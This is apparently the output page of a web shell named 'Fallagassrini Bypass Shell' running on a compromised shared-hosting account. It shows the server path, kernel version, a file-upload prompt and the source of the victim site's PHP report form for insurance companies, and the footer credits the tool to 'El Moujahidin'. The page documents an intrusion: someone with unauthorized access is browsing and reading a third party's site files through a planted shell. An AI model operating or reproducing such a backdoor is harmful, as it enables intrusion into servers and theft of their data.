? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/drafthr/system/application/views/Report/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/drafthr/system/application/views/Report/broinscompwise.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?> <script type="text/javascript">

jQuery(document).ready(function () {
        $('.one').datepick({dateFormat: 'dd-mm-yyyy'});
       $('.two').datepick({dateFormat: 'dd-mm-yyyy'});

});
</script>
<form id="customForm" name="customForm">
<fieldset>
        <div class="leftalign">
            <li><label>Insurance Company</label><?php
             $company=$this->mastermodel->getdatas('insurance_company');
     echo "<select name='insurance_company_id' id='insurance_company_id' >";
        if($companyname->company_name)
        echo "<option value='".$companyname->id."'>$companyname->company_name</option>";
        else
        echo "<option value='0'>Select Company</option>";
        if (count($company))
         {
        foreach ($company as $key => $list)
         {
        if($list['company_name']!=$companyname->company_name)
        echo "<option value='". $list['id'] . "'>" . $list['company_name'] . "</option>";
         }
        echo "</select>";
         }
         ?><span id="insurance_company_idInfo"></span></li>
        </div>

       <div class="rightalign">
                <ul>
                        
                        <li><label>Start Date</label><label><input class="one" id="fromdate" name="fromdate"  readonly="true" type="text" style="background-image: url(../../../../assets/images/datefocus.gif);"></label></li>
                        <li><label>End Date</label><label><input class="two" id="todate" name="todate"  readonly="true" type="text" style="background-image: url(../../../../assets/images/datefocus.gif);"></label></li>


                </ul>
        </div>


                            <div class="centeralign"><ul>
                        <li><label><input type="button" value="Generate Report" onclick="generatebroinscompwise();"></label></li>
                </ul>


        </div>
</fieldset>
</form>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net